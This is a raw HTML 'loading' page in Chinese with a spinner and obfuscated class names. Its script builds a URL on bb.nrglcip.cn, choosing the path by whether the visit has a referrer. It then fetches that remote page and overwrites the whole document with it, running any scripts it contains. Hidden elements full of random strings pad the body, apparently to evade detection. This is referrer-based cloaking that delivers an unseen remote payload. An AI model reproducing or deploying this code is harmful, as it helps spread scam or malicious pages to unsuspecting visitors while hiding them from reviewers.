<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ZySyfW18ds3 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ZySyfW18ds3 .hOHWzVxejO2 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ZySyfW18ds3 .content {
            line-height: 50px;
            text-align: center
        }

        .ZySyfW18ds3 .img {
            width: 100%
        }

        .ZySyfW18ds3 .CTitXVdH {
            text-align: center
        }

        .ZySyfW18ds3 .CTitXVdH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ZySyfW18ds3 .CTitXVdH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ZySyfW18ds3 .CTitXVdH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ZySyfW18ds3 .CTitXVdH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ZySyfW18ds3 .CTitXVdH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ZySyfW18ds3 .CTitXVdH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ZySyfW18ds3 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ma01duxwC(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dA0TyP = ma01duxwC('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dA0TyP +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dA0TyP +".html?a=share";
		}
		
        ugqqOcJj=url+"#"+new Date().getTime();
        ugqqOcJj && function() {
            $.get(ugqqOcJj, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>KXwHnzZu3Yjazn4f9nJe4uwfbGERbNVbrDmtMGmudjLdjVk1qmk8vqt6WUfYDUqQD35EADe9D2zdXuyCLQ4gvx</p>
<li style='display:none' >euIlqBaGxtLUli3GAbgr2FsYTQeHLLOpKs0yuMAlhZc5SgVQCDxDQmyhsnkXh5YNPi</li>
<img  src='' style='display:none'>
<li style='display:none' >euIlqBaGxtLUli3GAbgr2FsYTQeHLLOpKs0yuMAlhZc5SgVQCDxDQmyhsnkXh5YNPi</li>
<li style='display:none' >euIlqBaGxtLUli3GAbgr2FsYTQeHLLOpKs0yuMAlhZc5SgVQCDxDQmyhsnkXh5YNPi</li>
<li style='display:none' >euIlqBaGxtLUli3GAbgr2FsYTQeHLLOpKs0yuMAlhZc5SgVQCDxDQmyhsnkXh5YNPi</li>
<img  src='' style='display:none'>
<div style='display:none'>hLpsU92Ws9yprZIQpOo9GYbC3SxDe5kHJSHUIhAK9el8n8LgZTsO5GqzewID2MPqcud9hFKWObDfGDbc</div>
<a  href='#' style='display:none'>GAnqZ6nMKkkOkRdN4jgjsKWha2kS6</a><div class="ZySyfW18ds3">
    <div class="hOHWzVxejO2">
        <div class="CTitXVdH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >znzbvMegBfawnaatfw9pvk8ctVW4kDet2S52qjFLYyE7KZ5Y6DTpL8hEaAInAkvvBVVY4hJkxRSdhxXyeYG</ul>
<ul style='display:none' >znzbvMegBfawnaatfw9pvk8ctVW4kDet2S52qjFLYyE7KZ5Y6DTpL8hEaAInAkvvBVVY4hJkxRSdhxXyeYG</ul>
<img  src='' style='display:none'>
<div style='display:none'>Ek50gcSuE4V7hOMGBvE0OFo59s4UOsO2HmaeRYKBoPrzDVukevEYHmzBwh</div>
<h1 style='display:none' >NHwPAGLZiYEpP0oDhaqTpZRaYDiIjI7HkGZpluB12IhPpoc7a2WNqSNT4EsmCGuPjM0DatHDKjzNMuRT6yDqlP6iRk5vjuobqbM0</h1>
<a  href='#' style='display:none'>cklH97sSqOJXgAbGHqPm0aV5HLXbYJjzibiAv0FYOGcp5nZKuobwXwKMWKHgl8cI3hJYoqlS5</a></body>
</html>